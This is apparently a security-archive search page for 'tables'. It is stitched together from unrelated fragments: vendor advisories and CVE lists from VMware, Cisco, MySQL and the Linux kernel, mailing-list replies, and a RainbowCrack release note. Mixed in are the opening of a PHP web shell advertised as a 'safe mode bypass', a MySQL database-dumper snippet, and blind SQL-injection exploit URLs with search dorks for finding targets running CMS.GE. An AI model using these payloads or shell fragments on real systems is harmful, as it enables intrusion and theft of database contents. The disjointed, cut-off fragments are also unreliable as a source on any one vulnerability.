Next Page >>
tables
Msn : erne@ernealizm.us
Shell :
п»ї<html><head><title>* ernealizm * </title><body bgcolor="#000000"><table Width='100%' height='10%' bgcolor='#000000' border='1'>
<tr><td><center><font size="4" color="#FFFFFF"><span style="background-color: #000000">ErNe Safe Mode Bypass For BiyoSecurity.Net</span>
</font></center></td></tr></table>
<style type="text/css">
body,td {
font-family: "Tahoma";
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "Powered by CMS.GE"
[~] Dork2: priv8!
[+] Important tables and columns:
[*] Tables:
[~] Table: binn_users
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
ob_start();
ASP.NET
Python
Plone
CRuby 1.8, JRuby, Rubinius
v8
Vulnerability: Denial of Service through hash table
multi-collisions
Tracking IDs: oCERT-2011-003
CERT VU#903934
________________________________________________________________________
Vendor communication:
JRE 1.5.0_20: CVE-2009-2625, CVE-2009-2670, CVE-2009-2671,
CVE-2009-2672, CVE-2009-2673, CVE-2009-2675, CVE-2009-2676,
CVE-2009-2716, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720,
CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
application using the newt library.
The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-2905 to this issue.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,
CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL
Express Service Pack 3.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
## Summary ##
Timo Warns (PRESENSE Technologies GmbH) reported some vulnerabilities in
the Linux kernel that may lead to privilege escalation,
denial-of-service, or information leakage via corrupted partition
tables. Exploiting these vulnerabilities has been demonstrated by a "USB
Stick of Death" that crashes the Linux kernel upon connecting the stick.
The kernel automatically evaluates partition tables of storage devices.
Note that this happens independently of whether auto-mounting is enabled
or not. The code for evaluating MAC and LDM partition tables contains the
[~] True: http://localhost/[path]/template_permalink.asp?id=78 and 1=1
[~] False: http://localhost/[path]/template_permalink.asp?id=78 and 1=2
[+] Exploding:
[*] Checking table:
[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM tblauthor) >= 0
[~] Example2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from tblauthor)
[~] True: http://localhost/[path]/[any module]?id=1 and 1=1
[~] False: http://localhost/[path]/[any module]?id=1 and 1=2
[+] Exploding:
[*] Checking table:
[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
[~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users)
Of course you do, I can't blame you or your company. But let's be serious
here for a moment, wishing that you're the queen of England doesn't make
it so.
> Forensic examiners will inevitably come across corrupted data on target systems from time to time; and in standard computer forensics training, including classes offered by Guidance Software, examiners are trained to account for such issues. In addition, while Guidance Software maintains a robust in-house quality assurance process and strives to make our software as stable as possible, no software is completely crash-proof and there will always be anomalies, particularly involving extreme scenarios of corrupted target data.
Did you really just turn the shoddiness of your application into a
training opportunity?
Problem Description:
Multiple vulnerabilities were discovered and corrected in mysql:
* Joins involving a table with with a unique SET column could cause
a server crash (CVE-2010-3677).
* Use of TEMPORARY InnoDB tables with nullable columns could cause
a server crash (CVE-2010-3680).
users could learn the text location of a process, defeating protections
provided by address space layout randomization (ASLR).
CVE-2011-1010
Timo Warns reported an issue in the Linux support for Mac partition tables.
Local users with physical access could cause a denial of service (panic)
by adding a storage device with a malicious map_count value.
CVE-2011-1012
CVE-2010-1626
MySQL allows local users to delete the data and index files of another
user's MyISAM table via a symlink attack in conjunction with the DROP
TABLE command.
CVE-2010-1848
else if ( empty($_POST['message']) ) {
redirect_header("javascript:history.go(-1)", 2, _MD_ERRORMESSAGE);
exit();
}
else {
$sql = "SELECT * FROM ".$bbTable['forums']." WHERE forum_id = ".$_POST['forum'].""; // <-------- !!!
if (!$result = $db->query($sql)) {
redirect_header("index.php", 2, _MD_CANTGETFORUM);
exit();
}
...
has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,
CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,
CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to
the security issues fixed in kernel 2.6.18-164.11.1.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
see SESS_updateSessionTime() function near lines 418-436:
...
function SESS_updateSessionTime($sessid, $md5_based=0) {
global $_TABLES;
$newtime = (string) time();
if ($md5_based == 1) {
- Manually upgrade tools in the virtual machine (virtual machine
users will not be prompted to upgrade). Note the VI Client will
not show the VMware tools is out of date in the summary tab.
Please see http://tinyurl.com/27mpjo page 80 for details.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available. See above for remediation
details.
VMware Product Running Replace with/
Product Version on Apply Patch
And ex. the alternative syntax SUBSTR(str FROM n FOR n) instead of
SUBSTR(str,n,n) in a sub-SELECT statement.
Other attacks are possible, COM_applyFilter() is a very common used one.
Additional notes: 'direction' argument is uppercased by strtoupper(),
you know that table identifiers on Unix-like systems are case sensitives
but not on MS Windows, however I choosed to inject in the 'order' one
for better results.
Vars come from the $_REQUEST[] array so you can pass it by $_POST[] or
$_COOKIE[], which is not intended I suppose.
- Manually upgrade tools in the virtual machine (virtual machine
users will not be prompted to upgrade). Note the VI Client will
not show the VMware tools is out of date in the summary tab.
Please see http://tinyurl.com/27mpjo page 80 for details.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available. See above for remediation
details.
VMware Product Running Replace with/
Product Version on Apply Patch
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the
function set_sql_param()
{
$this->p_url = $this->get_p('url', true);
$this->p_pre = $this->get_p('prefix');
# Table prefix
if( !$this->p_pre )
{
# Default table prefix if not precised
$this->msg('Using default table prefix: ibf_', 1);
$this->p_pre = 'ibf_';
RainbowCrack is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. It cracks hashes with rainbow tables.
Version 1.4 of the RainbowCrack software is now available for download.
New features:
- New compact rainbow table file format (.rtc) reduce rainbow table size by 50% to 56.25%
- New rt2rtc utility convert rainbow table from raw file format (.rt) to compact file format (.rtc)
- New rtc2rt utility convert rainbow table from compact file format (.rtc) to raw file format (.rt)
- The rcrack/rcrack_cuda program support both .rt and .rtc rainbow table file format
- Conversion from non-perfect to perfect rainbow table is supported by rt2rtc utility
now WS_authenticate() function in /system/lib-webservices.php near lines 780-877:
...
function WS_authenticate()
{
global $_CONF, $_TABLES, $_USER, $_GROUPS, $_RIGHTS, $WS_VERBOSE;
$uid = '';
$username = '';
$password = '';
| > You can get by with a lot less than 64 bits. People see problems
| > like this and immediately think "birthday paradox", but there is no
| > "birthday paradox" here: You aren't look for pairs in an
| > ever-growing set, you're looking for matches against a fixed set.
| > If you use 30-bit hashes - giving you about a 120KB table - the
| > chance that any given key happens to hash to something in the table
| > is one in a billion, now and forever. (Of course, if you use a
| > given key repeatedly, and it happens to be that 1 in a billion, it
| > will hit every time. So an additional table of "known good keys
| > that happen to collide" is worth maintaining. Even if you somehow
Defense for reporting this issue.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2008-4916 to this issue.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
get the backup of site's DB via earlier mentioned Information Leakage
vulnerability, or for the purpose of creating of large number of backup
files, to occupy free space at the server. Or in order to receive backup on
email. These CSRF-attacks are possible if plugin WP-DB-Backup is activated.
With help of CSRF-attack it's possible to make backup of any tables, as all,
as selectively (e.g. table with users wp_users). In this exploit the backup
is making with table wp_users:
http://websecurity.com.ua/uploads/2010/WordPress%20Database%20Backup%20CSRF.html
PW> providing reasonably good entropy sources, there's little reason not to
PW> "do it right". It's not the worst mistake I've seen, by far not the most
PW> dangerous. But it's sloppy of the Apache Group to have ignored it for half
PW> a decade.
It's quite easy. Precomputing rainbow table for MD5 crypt with known
salt is somehow equivalent to MD5 crypt bruteforcing, if you don't mind
about required amount of storage. So, predictable salt and narrowed salt
space will have some impact if salt changes in a time comparable with
time required for bruteforcing. Salt changing once in a second is really
good one, because bruteforcing takes much longer.
CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,
CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525,
CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495,
CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
intended restrictions. This issue only affected Ubuntu 9.10 and 10.04 LTS.
(CVE-2010-1621)
It was discovered that MySQL could be made to delete another user's data
and index files. An authenticated user could use symlinks combined with the
DROP TABLE command to possibly bypass privilege checks. (CVE-2010-1626)
It was discovered that MySQL incorrectly validated the table name argument
of the COM_FIELD_LIST command. An authenticated user could use a specially-
crafted table name to bypass privilege checks and possibly access other
tables. (CVE-2010-1848)
Next Page>>
|
